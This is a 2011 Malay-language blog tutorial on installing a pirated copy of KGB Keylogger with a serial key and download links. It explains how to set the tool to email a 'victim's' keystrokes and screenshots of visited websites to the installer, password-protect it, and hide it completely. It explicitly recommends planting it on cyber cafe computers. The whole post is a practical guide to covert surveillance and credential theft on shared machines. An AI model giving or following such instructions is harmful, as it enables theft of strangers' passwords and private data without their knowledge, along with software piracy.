Saturday, 3 December 2011

KGB Keylogger!


UPDATE 3/7/2012 :
Link telah di-update.Selamat mendownload :)



UPDATE! :
Keylogger ni antivirus tetap akan detect.sebab ia sama jugak macam keylogger lain.



EDITED : KALI INI BETUL2 AKAN BERKESAN.AKU DAH TAMBAH DALAM TUTO NI STEP YANG HILANG SEBELUM NI.
------------------------------------------------------------------------------------------



Assalamualaikum dan salam sejahtera...hari ni aq nk ajar korang cara nk guna KGB keylogger....apa tu?macam keylogger biasa jugak la.tapi yg nih korang kena install dekat pc/lappy,then setup letak email korang.then keystroke akan sampai dekat email korang.sangat sesuai untuk korang install di Ciber Cafe!Yeah!jom start!




Download :

1.First korang mesti download KGB keylogger ni.jangan risau, yg nih beserta serial key.lepas download extract.

Download : 

KGB Keylogger 4.5.4 + Serial - Torrent
KGB Keylogger 4.5.4 + Serial - 4shared



Cara-cara install dan guna :


1. Double click pada file kgb_setup-454.exe.


2. Then tekan next, dan akan keluar gambar macam dibawah :




Pastikan anda pilih KGB Employee Monitor




3. Then tekan next, I agree bla bla bla....dan finish install.






4. Selepas finish install software ni akan run seniri dan akan keluar seperti gambar dibawah :





Click HELP.Dan Click Register.



5. Lepas tu, akan keluar satu kotak kecil yang ada tulis Registration.Buka file Serial.txt di dalam folder KGB Keylogger yg anda download tadi untuk mendapatkan serial key.Rujuk gambar dibawah :



Masukkan Reference Number dan Registration Key yang diperoleh dari file Serial.txt dan tekan OK.

6. Then KGB Keylogger akan menjadi full version!Langkah seterusnya ialah setup email anda.Click Delivery dan akan keluar seperti gambar dibawah :



1. Click Email
2. Masukkan Email anda.
3. Masukkan password email anda.
8. Setelah dah habis isi, tekan TEST
7. Selepas tekan test, dia akan test jika email yg anda letak tu boleh digunakan.Jika berjaya,akan keluar seperti gambar dibawah :



Korang bole check email korang.Jika tidak keluar seperti gambar diatas.Cuba check sekiranya anda silap letak email.




8. Next, korang mesti pastikan yang keylogger ini akan dapatkan semua data untuk korang.Cara-caranya rujuk gambar di bawah :




Click pada Logging.Then pastikan anda tick pada semua kotak2 seperti dalam gambar.




9. Seterusnya korang mesti pastikan yang keylogger ini akan mendapatkan screenshot website yg dilawati oleh mangsa.Rujuk gambar dibawah :




Click pada Website Visited,then pastikan anda tick kotak Make a website screenshot.



10. Then Click User dan click butang RECORD (BUTANG HIJAU).Rujuk gambar dibawah :



Click User dan click butang HIJAU.




11. Then, Korang perlu setup password untuk keylogger ini,supaya jikalau ada org yg menjumpainya, dia still x bole kacau apa kerana dihalang oleh password korang!Rujuk gambar bawah :



Click pada Password.Dan masukkan seperti dibawah :

enter current password = taufiqphc
new password = pass korang
cornfirm password = pass korang




Apabila korang nak run keylogger ini, akan keluar seperti gambar dibawah :






12. Last sekali anda perlu hide software ini dari orang lain.Click Invisibility.rujuk gambar dibawah :


Pastikan anda tick kotak HIDE EVERYWERE dan click apply.




13. DONE!!


note : segala keystroke mangsa akan sampai ke email anda dengan title LOG.


Credit to : Ahmad Taufiq

Itu saja untuk tutorial pada kali ini.Semoga berjaya!Assalamualaikum........
Item Reviewed: KGB Keylogger! Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com